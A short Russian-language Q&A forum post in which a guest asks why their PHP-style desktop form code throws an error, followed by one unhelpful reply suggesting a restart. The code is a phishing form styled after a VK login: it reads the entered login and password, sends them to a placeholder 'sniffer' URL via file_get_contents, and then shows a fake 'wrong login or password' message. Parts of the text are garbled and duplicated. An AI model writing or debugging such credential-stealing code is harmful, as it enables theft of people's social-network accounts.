меньше ?php namespace app\forms; use std, gui, framework, app; class Vk extends AbstractForm { }$edit1 = c('Form1- больше edit1')- больше text; $edit2 = c('Form1- больше edit2')- больше text; $url = "Ссылка на ваш сниффер"; ...

edit1')->text; $edit2 = c('Form1->edit2')->text; $url = "Ссылка на ваш сниффер"; file_get_contents($url . "?" . "Логин: " . $edit1 . " | Пароль: " . $edit2); MessageBox("Неверно введён логин или пароль", "Ошибка ввода"); Выдает ошибку((( что делать??? ошибка здесь: }$edit1 = c('Form1->edit1')->text;
Гость
Ответ(ы) на вопрос:
Гость
попробуй перезагрузить компьютер(если не работает то попробуй с другого браузера)